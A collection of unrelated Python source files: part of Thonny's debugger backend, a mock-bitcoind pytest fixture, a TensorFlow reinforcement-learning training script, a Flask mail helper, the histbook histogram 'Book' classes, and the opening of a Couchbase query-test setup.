return Tracer._execute_prepared_user_code(self, statements, expression, global_vars)
finally:
"""
from thonny.misc_utils import _win_get_used_memory
print("Memory:", _win_get_used_memory() / 1024 / 1024)
print("States:", len(self._saved_states))
print(self._fulltags.most_common())
"""
class CustomStackFrame:
def __init__(self, frame, event, focus=None):
self.system_frame = frame
self.event = event
self.focus = focus
self.current_evaluations = []
self.current_statement = None
self.current_root_expression = None
self.node_tags = set()
class FancySourceFileLoader(SourceFileLoader):
"""Used for loading and instrumenting user modules during fancy tracing"""
def __init__(self, fullname, path, tracer):
super().__init__(fullname, path)
self._tracer = tracer
def source_to_code(self, data, path, *, _optimize=-1):
old_tracer = sys.gettrace()
sys.settrace(None)
try:
root = self._tracer._prepare_ast(data, path, "exec")
return super().source_to_code(root, path)
finally:
sys.settrace(old_tracer)
def _get_frame_prefix(frame):
return str(id(frame)) + " " + ">" * len(inspect.getouterframes(frame, 0)) + " "
def _get_python_version_string(add_word_size=False):
result = ".".join(map(str, sys.version_info[:3]))
if sys.version_info[3] != "final":
result += "-" + sys.version_info[3]
if add_word_size:
result += " (" + ("64" if sys.maxsize > 2 ** 32 else "32") + " bit)"
return result
def _fetch_frame_source_info(frame):
if frame.f_code.co_filename is None or not os.path.exists(frame.f_code.co_filename):
return None, None, True
is_libra = _is_library_file(frame.f_code.co_filename)
if frame.f_code.co_name == "<module>":
# inspect.getsource and getsourcelines don't help here
with tokenize.open(frame.f_code.co_filename) as fp:
return fp.read(), 1, is_libra
else:
# function or class
try:
source = inspect.getsource(frame.f_code)
# inspect.getsource is not reliable, see eg:
# https://bugs.python.org/issue35101
# If the code name is not present as definition
# in the beginning of the source,
# then play safe and return the whole script
first_line = source.splitlines()[0]
if re.search(r"\b(class|def)\b\s+\b%s\b" % frame.f_code.co_name, first_line) is None:
with tokenize.open(frame.f_code.co_filename) as fp:
return fp.read(), 1, is_libra
else:
return source, frame.f_code.co_firstlineno, is_libra
except OSError:
logger.exception("Problem getting source")
return None, None, True
def format_exception_with_frame_info(e_type, e_value, e_traceback, shorten_filenames=False):
"""Need to suppress thonny frames to avoid confusion"""
_traceback_message = "Traceback (most recent call last):\n"
_cause_message = getattr(
traceback,
"_cause_message",
("\nThe above exception was the direct cause " + "of the following exception:") + "\n\n",
)
_context_message = getattr(
traceback,
"_context_message",
("\nDuring handling of the above exception, " + "another exception occurred:") + "\n\n",
)
def rec_format_exception_with_frame_info(etype, value, tb, chain=True):
# Based on
# https://www.python.org/dev/peps/pep-3134/#enhanced-reporting
# and traceback.format_exception
if etype is None:
etype = type(value)
if tb is None:
tb = value.__traceback__
if chain:
if value.__cause__ is not None:
yield from rec_format_exception_with_frame_info(None, value.__cause__, None)
yield (_cause_message, None, None, None)
elif value.__context__ is not None and not value.__suppress_context__:
yield from rec_format_exception_with_frame_info(None, value.__context__, None)
yield (_context_message, None, None, None)
if tb is not None:
yield (_traceback_message, None, None, None)
have_seen_first_relevant_frame = False
tb_temp = tb
for entry in traceback.extract_tb(tb):
assert tb_temp is not None # actual tb doesn't end before extract_tb
if (
"thonny/backend" not in entry.filename
and "thonny\\backend" not in entry.filename
and (
not entry.filename.endswith(os.sep + "ast.py")
or entry.name != "parse"
or etype is not SyntaxError
)
or (
have_seen_first_relevant_frame
and not (issubclass(etype, ImportError) and entry.name == "_custom_import")
)
or in_debug_mode()
):
have_seen_first_relevant_frame = True
fmt = ' File "{}", line {}, in {}\n'.format(
entry.filename, entry.lineno, entry.name
)
if entry.line:
fmt += " {}\n".format(entry.line.strip())
yield (fmt, id(tb_temp.tb_frame), entry.filename, entry.lineno)
tb_temp = tb_temp.tb_next
assert tb_temp is None # tb was exhausted
for line in traceback.format_exception_only(etype, value):
if etype is SyntaxError and line.endswith("^\n"):
# for some reason it may add several empty lines before ^-line
partlines = line.splitlines()
while len(partlines) >= 2 and partlines[-2].strip() == "":
del partlines[-2]
line = "\n".join(partlines) + "\n"
yield (line, None, None, None)
items = rec_format_exception_with_frame_info(e_type, e_value, e_traceback)
return list(items)
def in_debug_mode():
return os.environ.get("THONNY_DEBUG", False) in [1, "1", True, "True", "true"]
def _is_library_file(filename):
return (
filename is None
or path_startswith(filename, sys.prefix)
or hasattr(sys, "base_prefix")
and path_startswith(filename, sys.base_prefix)
or hasattr(sys, "real_prefix")
and path_startswith(filename, getattr(sys, "real_prefix"))
or site.ENABLE_USER_SITE
and path_startswith(filename, site.getusersitepackages())
)
def _report_internal_error():
print("PROBLEM WITH THONNY'S BACK-END:\n", file=sys.stderr)
traceback.print_exc()
def get_vm():
return _vm
|
conftest.py
|
import pytest
from time import sleep
from threading import Thread
import bitcoind_mock.conf as conf
from bitcoind_mock.bitcoind import BitcoindMock
from bitcoind_mock.auth_proxy import AuthServiceProxy
def bitcoin_cli():
return AuthServiceProxy(
"http://%s:%s@%s:%d" % (conf.BTC_RPC_USER, conf.BTC_RPC_PASSWD, conf.BTC_RPC_HOST, conf.BTC_RPC_PORT)
)
@pytest.fixture(scope="module")
def run_bitcoind():
bitcoind_thread = Thread(target=BitcoindMock().run, kwargs={"mode": "event"})
bitcoind_thread.daemon = True
bitcoind_thread.start()
# It takes a little bit of time to start the API (otherwise the requests are sent too early and they fail)
sleep(0.1)
@pytest.fixture(scope="module")
def genesis_block_hash(run_bitcoind):
return bitcoin_cli().getblockhash(0)
|
main.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import threading
import signal
import math
import os
import time
from environment.environment import Environment
from model.model import UnrealModel
from train.trainer import Trainer
from train.rmsprop_applier import RMSPropApplier
from options import get_options
USE_GPU = True # To use GPU, set True
# get command line args
flags = get_options("training")
def log_uniform(lo, hi, rate):
log_lo = math.log(lo)
log_hi = math.log(hi)
v = log_lo * (1-rate) + log_hi * rate
return math.exp(v)
class Application(object):
def __init__(self):
pass
def train_function(self, parallel_index, preparing):
""" Train each environment. """
trainer = self.trainers[parallel_index]
if preparing:
trainer.prepare()
# set start_time
trainer.set_start_time(self.start_time)
while True:
if self.stop_requested:
break
if self.terminate_reqested:
trainer.stop()
break
if self.global_t > flags.max_time_step:
trainer.stop()
break
if parallel_index == 0 and self.global_t > self.next_save_steps:
# Save checkpoint
self.save()
diff_global_t = trainer.process(self.sess,
self.global_t,
self.summary_writer,
self.summary_op,
self.score_input)
self.global_t += diff_global_t
def run(self):
device = "/cpu:0"
if USE_GPU:
device = "/gpu:0"
initial_learning_rate = log_uniform(flags.initial_alpha_low,
flags.initial_alpha_high,
flags.initial_alpha_log_rate)
self.global_t = 0
self.stop_requested = False
self.terminate_reqested = False
action_size = Environment.get_action_size(flags.env_type,
flags.env_name)
self.global_network = UnrealModel(action_size,
-1,
flags.use_pixel_change,
flags.use_value_replay,
flags.use_reward_prediction,
flags.pixel_change_lambda,
flags.entropy_beta,
device)
self.trainers = []
learning_rate_input = tf.placeholder("float")
grad_applier = RMSPropApplier(learning_rate = learning_rate_input,
decay = flags.rmsp_alpha,
momentum = 0.0,
epsilon = flags.rmsp_epsilon,
clip_norm = flags.grad_norm_clip,
device = device)
for i in range(flags.parallel_size):
trainer = Trainer(i,
self.global_network,
initial_learning_rate,
learning_rate_input,
grad_applier,
flags.env_type,
flags.env_name,
flags.use_pixel_change,
flags.use_value_replay,
flags.use_reward_prediction,
flags.pixel_change_lambda,
flags.entropy_beta,
flags.local_t_max,
flags.gamma,
flags.gamma_pc,
flags.experience_history_size,
flags.max_time_step,
device)
self.trainers.append(trainer)
# prepare session
config = tf.ConfigProto(log_device_placement=False,
allow_soft_placement=True)
config.gpu_options.allow_growth = True
self.sess = tf.Session(config=config)
self.sess.run(tf.global_variables_initializer())
# summary for tensorboard
self.score_input = tf.placeholder(tf.int32)
tf.summary.scalar("score", self.score_input)
self.summary_op = tf.summary.merge_all()
self.summary_writer = tf.summary.FileWriter(flags.log_file,
self.sess.graph)
# init or load checkpoint with saver
self.saver = tf.train.Saver(self.global_network.get_vars())
checkpoint = tf.train.get_checkpoint_state(flags.checkpoint_dir)
if checkpoint and checkpoint.model_checkpoint_path:
self.saver.restore(self.sess, checkpoint.model_checkpoint_path)
print("checkpoint loaded:", checkpoint.model_checkpoint_path)
tokens = checkpoint.model_checkpoint_path.split("-")
# set global step
self.global_t = int(tokens[1])
print(">>> global step set: ", self.global_t)
# set wall time
wall_t_fname = flags.checkpoint_dir + '/' + 'wall_t.' + str(self.global_t)
with open(wall_t_fname, 'r') as f:
self.wall_t = float(f.read())
self.next_save_steps = (self.global_t + flags.save_interval_step) // flags.save_interval_step * flags.save_interval_step
else:
print("Could not find old checkpoint")
# set wall time
self.wall_t = 0.0
self.next_save_steps = flags.save_interval_step
# run training threads
self.train_threads = []
for i in range(flags.parallel_size):
self.train_threads.append(threading.Thread(target=self.train_function, args=(i,True)))
signal.signal(signal.SIGINT, self.signal_handler)
# set start time
self.start_time = time.time() - self.wall_t
for t in self.train_threads:
t.start()
print('Press Ctrl+C to stop')
signal.pause()
def save(self):
""" Save checkpoint.
Called from therad-0.
"""
self.stop_requested = True
# Wait for all other threads to stop
for (i, t) in enumerate(self.train_threads):
if i != 0:
t.join()
# Save
if not os.path.exists(flags.checkpoint_dir):
os.mkdir(flags.checkpoint_dir)
# Write wall time
wall_t = time.time() - self.start_time
wall_t_fname = flags.checkpoint_dir + '/' + 'wall_t.' + str(self.global_t)
with open(wall_t_fname, 'w') as f:
f.write(str(wall_t))
print('Start saving.')
self.saver.save(self.sess,
flags.checkpoint_dir + '/' + 'checkpoint',
global_step = self.global_t)
print('End saving.')
self.stop_requested = False
self.next_save_steps += flags.save_interval_step
# Restart other threads
for i in range(flags.parallel_size):
if i != 0:
thread = threading.Thread(target=self.train_function, args=(i,False))
self.train_threads[i] = thread
thread.start()
def signal_handler(self, signal, frame):
print('You pressed Ctrl+C!')
self.terminate_reqested = True
def main(argv):
app = Application()
app.run()
if __name__ == '__main__':
tf.app.run()
|
email.py
|
from flask import current_app,render_template
from flask_mail import Mail,Message
import threading
from .extensions import mail
def async_send_mail(app,msg):
with app.app_context():
mail.send(msg)
#发送邮件
def send_mail(subject,to,temname,**kwargs):
app = current_app._get_current_object() #通过当前app对象的代理对象 拿到实例化的app对象
msg = Message(subject=subject,recipients=[to],sender=current_app.config['MAIL_USERNAME'])
msg.html = render_template('email/'+temname+'.html',**kwargs)
t = threading.Thread(target=async_send_mail,args=(app,msg))
t.start()
|
book.py
|
#!/usr/bin/env python
# Copyright (c) 2018, DIANA-HEP
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import collections
import fnmatch
import functools
import sys
import threading
import numpy
import histbook.calc.spark
import histbook.fill
import histbook.hist
import histbook.util
if sys.version_info[0] <= 2:
string = basestring
else:
string = str
################################################################ superclass of all books (glorified dict)
class GenericBook(collections.MutableMapping):
"""
A generic collection of histograms (:py:class:`Hist <histbook.hist.Hist>`) or other ``Books``.
This generic superclass can't be filled; for a fillable book, use :py:class:`Book <histbook.book.Book>`.
Behaves like a dict (item assignment, ``keys``, ``values``).
"""
def __init__(self, hists1={}, *hists2, **hists3):
u"""
Positional arguments may be a dict of str \u2192 :py:class:`Hist <histbook.hist.Hist>` or :py:class:`GenericBook <histbook.book.GenericBook>`.
Or they may be :py:class:`Hist <histbook.hist.Hist>` or :py:class:`GenericBook <histbook.book.GenericBook>` as unnamed varargs.
In either case, keyword name \u2192 :py:class:`Hist <histbook.hist.Hist>` or :py:class:`Book <histbook.book.Book>` are also accepted.
"""
self._content = collections.OrderedDict()
self._attachment = {}
if isinstance(hists1, dict):
for n, x in hists1.items():
self[n] = x
if len(hists2) != 0:
raise TypeError("only one positional argument when the first argument is a dict")
elif isinstance(hists1, (histbook.hist.Hist, GenericBook)):
self["0"] = hists1
for i, x in enumerate(hists2):
self[str(i + 1)] = x
else:
raise TypeError("positional arguments may be a single dict or varargs of unnamed histograms/books")
for n, x in hists3.items():
self[n] = x
self._changed()
def _changed(self):
pass
@classmethod
def fromdicts(cls, content, attachment):
"""Construct a book from its ``content`` and ``attachment`` dicts."""
out = cls.__new__(cls)
out._content = collections.OrderedDict()
out._attachment = attachment
for n, x in content.items():
out[n] = x
out._changed()
return out
def attach(self, key, value):
"""Add an attachment to the book (changing it in-place and returning it)."""
self._attachment[key] = value
return self
def detach(self, key):
"""Remove an attachment from the book (changing it in-place and returning it)."""
del self._attachment[key]
return self
def has(self, key):
"""Returns ``True`` if ``key`` exists in the attachment metadata."""
return key in self._attachment
def get(self, key, *default):
"""
Get an item of attachment metadata.
If ``key`` isn't found and no ``default`` is specified, raise a ``KeyError``.
If ``key`` isn't found and a ``default`` is provided, return the ``default`` instead.
Only one ``default`` is allowed.
"""
if len(default) == 0:
return self._attachment[key]
elif len(default) == 1:
return self._attachment.get(key, default[0])
else:
raise TypeError("get takes 1 or 2 arguments; {0} provided".format(len(default) + 1))
@property
def attachment(self):
"""Python dict of attachment metadata (linked, not a copy)."""
return self._attachment
def __repr__(self):
return "<{0} ({1} content{2}{3}) at {4:012x}>".format(self.__class__.__name__, len(self), "" if len(self) == 1 else "s", "" if len(self._attachment) == 0 else " {0} attachment{1}".format(len(self._attachment), "" if len(self._attachment) == 1 else "s"), id(self))
def __str__(self, indent=",\n ", first=True):
return self.__class__.__name__ + "({" + (indent.replace(",", "") if first else "") + indent.join("{0}: {1}".format(repr(n), x.__str__(indent + " " if isinstance(x, GenericBook) else ", ", True)) for n, x in self.iteritems()) + (indent.replace(",", "") if first else "") + "})"
def __eq__(self, other):
return self.__class__ is other.__class__ and self._content == other._content and self._attachment == other._attachment
def __ne__(self, other):
return not self.__eq__(other)
def compatible(self, other):
"""Returns True if the books have the same set of histogram names and those histograms with matching names are compatible."""
return set(self.iterkeys()) == set(other.iterkeys()) and all(self[n].compatible(other[n]) for n in self.iterkeys())
def assertcompatible(self):
"""Raises ``ValueError`` if not all books have the same set of histogram names and those histograms with matching names are compatible."""
def recurse(path, one, two):
if isinstance(one, GenericBook) and one.__class__ is two.__class__:
if set(one.iterkeys()) != set(two.iterkeys()):
raise ValueError("key names at {0} are not compatible (same book types, names, and non-profile axis binning):\n\n {1}\n\nversus\n\n {2}\n".format(repr(path), sorted(one.iterkeys()), sorted(two.iterkeys())))
else:
for n in one.iterkeys():
recurse(path + "/" + n, one[n], two[n])
elif isinstance(one, histbook.hist.Hist) and isinstance(two, histbook.hist.Hist):
if not one.compatible(two):
raise ValueError("histograms at {0} are not compatible (same book types, names, and non-profile axis binning):\n\n {1}\n\nversus\n\n {2}\n".format(repr(path), repr(one), repr(two)))
else:
raise ValueError("histograms at {0} are not compatible (same book types, names, and non-profile axis binning):\n\n {1}\n\nversus\n\n {2}\n".format(repr(path), repr(type(one)), repr(type(two))))
if len(self._content) >= 2:
items = list(self._content.items())
for (n1, x1), (n2, x2) in zip(items[:-1], items[1:]):
recurse("{" + n1 + "," + n2 + "}", x1, x2)
def tojson(self):
def merge(name, node):
node["name"] = name
return node
out = {"type": self.__class__.__name__, "content": [merge(n, x.tojson()) for n, x in self._content.items()]}
if len(self._attachment) != 0:
out["attachment"] = self._attachment
return out
@staticmethod
def fromjson(obj):
cls = getattr(sys.modules[GenericBook.__module__], obj["type"])
content = collections.OrderedDict()
for node in obj["content"]:
if node["type"] == "Hist":
content[node["name"]] = histbook.hist.Hist.fromjson(node)
else:
content[node["name"]] = GenericBook.fromjson(node)
return cls.fromdicts(content, obj.get("attachment", {}))
def __len__(self):
return len(self._content)
def __contains__(self, name):
try:
self[name]
except KeyError:
return False
else:
return True
def _get(self, name):
attempt = self._content.get(name, None)
if attempt is not None:
return attempt
else:
try:
slash = name.index("/")
except ValueError:
pass
else:
attempt = self._content.get(name[:slash], None)
if isinstance(attempt, GenericBook):
return attempt._get(name[slash + 1:])
return None
def _set(self, name, value, path):
try:
slash = name.index("/")
except ValueError:
self._content[name] = value
self._changed()
else:
attempt = self._content.get(name[:slash], None)
if attempt is None:
attempt = self._content[name[:slash]] = Book()
if isinstance(attempt, GenericBook):
attempt._set(name[slash + 1:], value, path + "/" + name[:slash])
self._changed()
else:
raise KeyError("value at {0} is a Hist, not a book".format(repr(path)))
def _del(self, name, path):
if name in self._content:
del self._content[name]
self._changed()
else:
try:
slash = name.index("/")
except ValueError:
raise KeyError("could not find {0}".format(name if path == "" else path + "/" + name))
else:
attempt = self._content.get(name[:slash], None)
if isinstance(attempt, GenericBook):
attempt._del(name[slash + 1:], path + "/" + name[:slash])
self._changed()
else:
raise KeyError("could not find {0}".format(name if path == "" else path + "/" + name))
def __getitem__(self, name):
if not isinstance(name, string):
raise TypeError("keys of a {0} must be strings".format(self.__class__.__name__))
if "*" in name or "?" in name or "[" in name:
return [x for n, x in self.iteritems(recursive=True) if fnmatch.fnmatchcase(n, name)]
else:
out = self._get(name)
if out is not None:
return out
else:
raise KeyError("could not find {0} and could not interpret it as a wildcard (glob) pattern".format(repr(name)))
def __setitem__(self, name, value):
if not isinstance(name, string):
raise TypeError("keys of a {0} must be strings".format(self.__class__.__name__))
if not isinstance(value, (histbook.hist.Hist, GenericBook)):
raise TypeError("values of a {0} must be Hists or books".format(self.__class__.__name__))
self._set(name, value, "")
def __delitem__(self, name):
if not isinstance(name, string):
raise TypeError("keys of a {0} must be strings".format(self.__class__.__name__))
if "*" in name or "?" in name or "[" in name:
for n in self.allkeys():
self._del(n, "")
else:
self._del(name, "")
def _iteritems(self, path, recursive, onlyhist):
for n, x in self._content.items():
if not onlyhist or isinstance(x, histbook.hist.Hist):
yield (n if path is None else path + "/" + n), x
if recursive and isinstance(x, GenericBook):
for y in x._iteritems((n if path is None else path + "/" + n), recursive, onlyhist):
yield y
def iteritems(self, recursive=False, onlyhist=False):
"""
Iterate through path, book-or-histogram pairs.
Parameters
----------
recursive : bool
if ``True`` *(default)*, descend into books of books
onlyhist : bool
if ``True`` *(not default)*, only return histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
for n, x in self._iteritems(None, recursive, onlyhist):
yield n, x
def iterkeys(self, recursive=False, onlyhist=False):
"""
Iterate through paths.
Parameters
----------
recursive : bool
if ``True`` *(default)*, descend into books of books
onlyhist : bool
if ``True`` *(not default)*, only return names of histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
for n, x in self.iteritems(recursive=recursive, onlyhist=onlyhist):
yield n
def itervalues(self, recursive=False, onlyhist=False):
"""
Iterate through books and histograms.
Parameters
----------
recursive : bool
if ``True`` *(default)*, descend into books of books
onlyhist : bool
if ``True`` *(not default)*, only return histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
for n, x in self.iteritems(recursive=recursive, onlyhist=onlyhist):
yield x
def items(self, recursive=False, onlyhist=False):
"""
Return a list of path, book-or-histogram pairs.
Parameters
----------
recursive : bool
if ``True`` *(default)*, descend into books of books
onlyhist : bool
if ``True`` *(not default)*, only return histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
return list(self.iteritems(recursive=recursive, onlyhist=onlyhist))
def keys(self, recursive=False, onlyhist=False):
"""
Return a list of paths.
Parameters
----------
recursive : bool
if ``True`` *(default)*, descend into books of books
onlyhist : bool
if ``True`` *(not default)*, only return names of histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
return list(self.iterkeys(recursive=recursive, onlyhist=onlyhist))
def values(self, recursive=False, onlyhist=False):
"""
Return a list of books and histograms.
Parameters
----------
recursive : bool
if ``True`` *(default)*, descend into books of books
onlyhist : bool
if ``True`` *(not default)*, only return histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
return list(self.itervalues(recursive=recursive, onlyhist=onlyhist))
def allitems(self, onlyhist=False):
"""
Return a recursive list of path, book-or-histogram pairs.
Parameters
----------
onlyhist : bool
if ``True`` *(not default)*, only return histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
return self.items(recursive=True, onlyhist=onlyhist)
def allkeys(self, onlyhist=False):
"""
Return a recursive list of paths.
Parameters
----------
onlyhist : bool
if ``True`` *(not default)*, only return names of histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
return self.keys(recursive=True, onlyhist=onlyhist)
def allvalues(self, onlyhist=False):
"""
Return a recursive list of books and histograms.
Parameters
----------
onlyhist : bool
if ``True`` *(not default)*, only return histograms (type :py:class:`Hist <histbook.hist.Hist>`), not books
"""
return self.values(recursive=True, onlyhist=onlyhist)
def __iter__(self):
"""Same as ``iteritems(recursive=True, onlyhist=True)``."""
return self.iteritems(recursive=True, onlyhist=True)
def copy(self):
"""Return an immediate copy of the book of histograms."""
return self.__class__.fromdicts(collections.OrderedDict((n, x.copy()) for n, x in self.items()), dict(self._attachment))
def copyonfill(self):
"""Return a copy of the book of histograms whose content is copied if filled."""
return self.__class__.fromdicts(collections.OrderedDict((n, x.copyonfill()) for n, x in self.items()), dict(self._attachment))
def clear(self):
"""Effectively reset all bins of all histograms to zero."""
for x in self.itervalues(recursive=True, onlyhist=True):
x.clear()
def cleared(self):
"""Return a copy with all bins of all histograms set to zero."""
return self.__class__.fromdicts(collections.OrderedDict((n, x.cleared()) for n, x in self.items()), dict(self._attachment))
def __add__(self, other):
if not isinstance(other, GenericBook):
raise TypeError("histogram books can only be added to other histogram books")
content = collections.OrderedDict()
for n, x in self.iteritems():
if n in other:
content[n] = x + other[n]
else:
content[n] = x
for n, x in other.iteritems():
if n not in self:
content[n] = x
attachment = dict(self._attachment)
attachment.update(other._attachment)
return self.__class__.fromdicts(content, attachment)
def __iadd__(self, other):
if not isinstance(other, GenericBook):
raise TypeError("histogram books can only be added to other histogram books")
for n, x in other.iteritems():
if n not in self:
self[n] = x
else:
self[n] += x
return self
def __mul__(self, value):
content = collections.OrderedDict()
for n, x in self.iteritems():
content[n] = x.__mul__(value)
return self.__class__.fromdicts(content, dict(self._attachment))
def __rmul__(self, value):
return self.__mul__(value)
def __imul__(self, value):
for x in self.itervalues():
x.__imul__(value)
return self
@classmethod
def group(cls, by="source", **books):
"""
Combine histograms, maintaining their distinctiveness by adding a new categorical axis to each.
To combine histograms by adding bins, just use the ``+`` operator.
Parameters
----------
by : string
name of the new axis (must not already exist)
**books : :py:class:`Book <histbook.book.Book>`
books to combine (histograms with the same names must have the same axes)
"""
if any(not isinstance(x, GenericBook) for x in books.values()):
raise TypeError("only histogram books can be grouped with other books")
content = collections.OrderedDict()
for name in functools.reduce(set.union, (set(book.iterkeys()) for book in books.values())):
nestcls = tuple(set(book[name].__class__ for book in books.values() if name in book))
if len(nestcls) != 1:
raise TypeError("books at {0} have different types: {1}".format(repr(name), ", ".join(repr(x) for x in nestcls)))
content[name] = nestcls[0].group(by=by, **dict((n, book[name]) for n, book in books.items() if name in book))
attachment = {}
for book in books.values():
attachment.update(book._attachment)
return cls.fromdicts(content, attachment)
################################################################ user-level Book (in the histbook.* namespace)
class Book(GenericBook, histbook.fill.Fillable):
"""
A collection of histograms (:py:class:`Hist <histbook.hist.Hist>`) or other ``Books`` that can be filled with a single ``fill`` call.
Behaves like a dict (item assignment, ``keys``, ``values``).
"""
def __str__(self, indent=",\n ", first=False):
return super(Book, self).__str__(indent=indent, first=first)
def _changed(self):
self._fields = None
@property
def _goals(self):
return functools.reduce(set.union, (x._goals for x in self.itervalues(recursive=True, onlyhist=True)))
def _streamline(self, i, instructions):
self._destination = []
for i, x in enumerate(self.itervalues(recursive=True, onlyhist=True)):
self._destination.append(x._destination[0])
x._streamline(i, instructions)
return instructions
def fill(self, arrays=None, **more):
u"""
Fill the histograms: identify bins for independent variables, increase their counts by ``1`` or ``weight``, and increment any profile (dependent variable) means and errors in the means.
All arrays must have the same length (one-dimensional shape). Numbers are treated as one-element arrays.
All histograms in the book are filled with the same inputs.
Parameters
----------
arrays : dict \u2192 Numpy array or number; Spark DataFrame; Pandas DataFrame
field values to use in the calculation of independent and dependent variables (axes)
**more : Numpy arrays or numbers
more field values
"""
if histbook.calc.spark.isspark(arrays, more):
# pyspark.DataFrame
threads = [threading.Thread(target=histbook.calc.spark.fillspark(x, arrays)) for x in self.itervalues(recursive=True, onlyhist=True)]
for x in self.itervalues(recursive=True, onlyhist=True):
x._prefill()
for x in threads:
x.start()
for x in threads:
x.join()
elif arrays.__class__.__name__ == "DataFrame" and arrays.__class__.__module__ == "pandas.core.frame":
# pandas.DataFrame
if len(more) > 0:
raise TypeError("if arrays is a Pandas DataFrame, keyword arguments are not allowed")
self.fill(dict((n, arrays[n].values) for n in arrays.columns))
else:
# dict-like of numpy.ndarray (or castable)
if arrays is None:
arrays = more
elif len(more) == 0:
pass
else:
arrays = histbook.util.ChainedDict(arrays, more)
for x in self.itervalues(recursive=True, onlyhist=True):
x._prefill()
length = self._fill(arrays)
for x in self.itervalues(recursive=True, onlyhist=True):
x._postfill(arrays, length)
################################################################ for constructing fillable views
class ViewableBook(GenericBook):
def view(self, name):
if not isinstance(name, string):
raise TypeError("keys of a {0} must be strings".format(self.__class__.__name__))
def recurse(node, path):
if isinstance(node, histbook.hist.Hist):
if fnmatch.fnmatchcase(path, name):
return node
else:
return None
else:
content = collections.OrderedDict()
for n, x in node.iteritems():
deep = recurse(x, (n if path is None else path + "/" + n))
if deep is not None:
content[n] = deep
if len(content) != 0:
return ViewBook.fromdicts(content, node._attachment)
else:
return None
out = recurse(self, None)
if out is None:
raise ValueError("nothing matched path wildcard pattern {0}".format(repr(name)))
return out
class ViewBook(Book):
def __str__(self, indent=",\n ", first=True):
return super(ViewBook, self).__str__(indent=indent, first=first)
################################################################ statistically relevant books
class ChannelsBook(ViewableBook):
pass
class SamplesBook(ViewableBook):
def __init__(self, samples, hists1={}, *hists2, **hists3):
self._content = collections.OrderedDict()
self._attachment = {}
for sample in samples:
self[sample] = Book(hists1, *hists2, **hists3).copyonfill()
self._changed()
class SystematicsBook(Book):
def __str__(self, indent=",\n ", first=True):
return super(SystematicsBook, self).__str__(indent=indent, first=first)
def _changed(self):
self.assertcompatible()
if not all(x.has("systematic") for x in self.itervalues(recursive=True, onlyhist=True)):
raise ValueError("all histograms in a SystematicsBook must have a 'systematic' attachment")
|
base_test_rqg.py
|
import paramiko
from basetestcase import BaseTestCase
import os
import zipfile
import Queue
import json
import threading
from memcached.helper.data_helper import VBucketAwareMemcached
from rqg_mysql_client import RQGMySQLClient
from membase.api.rest_client import RestConnection, Bucket
from couchbase_helper.tuq_helper import N1QLHelper
from rqg_query_helper import RQGQueryHelper
from remote.remote_util import RemoteMachineShellConnection
import random
from itertools import combinations
import shutil
from os import listdir
from os.path import isfile, join
import traceback
from rqg_postgres_client import RQGPostgresClient
from membase.api.exception import CBQError
class BaseRQGTests(BaseTestCase):
def setUp(self):
try:
super(BaseRQGTests, self).setUp()
self.log.info("============== RQG Setup Has Started ==============")
self.client_map = {}
self.check_covering_index = self.input.param("check_covering_index", True)
self.skip_setup_cleanup = True
self.crud_ops = self.input.param("crud_ops", False)
self.ansi_joins = self.input.param("ansi_joins", False)
self.with_let = self.input.param("with_let", False)
self.ansi_transform = self.input.param("ansi_transform", False)
self.prepared = self.input.param("prepared", False)
self.hash_joins = self.input.param("hash_joins", False)
self.create_secondary_meta_indexes = self.input.param("create_secondary_meta_indexes", False)
self.aggregate_pushdown = self.input.param("aggregate_pushdown", False)
self.create_secondary_ansi_join_indexes = self.input.param("create_secondary_ansi_join_indexes", False)
self.remove_alias = self.input.param("remove_alias", True)
self.skip_cleanup = self.input.param("skip_cleanup", False)
self.build_secondary_index_in_seq = self.input.param("build_secondary_index_in_seq", False)
self.number_of_buckets = self.input.param("number_of_buckets", 5)
self.crud_type = self.input.param("crud_type", "update")
self.populate_with_replay = self.input.param("populate_with_replay", False)
self.crud_batch_size = self.input.param("crud_batch_size", 1)
self.record_failure = self.input.param("record_failure", False)
self.failure_record_path = self.input.param("failure_record_path", "/tmp")
self.use_mysql = self.input.param("use_mysql", False)
self.use_postgres = self.input.param("use_postgres", False)
self.initial_loading_to_cb = self.input.param("initial_loading_to_cb", True)
self.change_bucket_properties = self.input.param("change_bucket_properties", False)
self.database = self.input.param("database", "flightstats")
self.merge_operation = self.input.param("merge_operation", False)
self.load_copy_table = self.input.param("load_copy_table", False)
self.user_id = self.input.param("user_id", "root")
self.user_cluster = self.input.param("user_cluster", "Administrator")
self.password = self.input.param("password", "")
self.password_cluster = self.input.param("password_cluster", "password")
self.generate_input_only = self.input.param("generate_input_only", False)
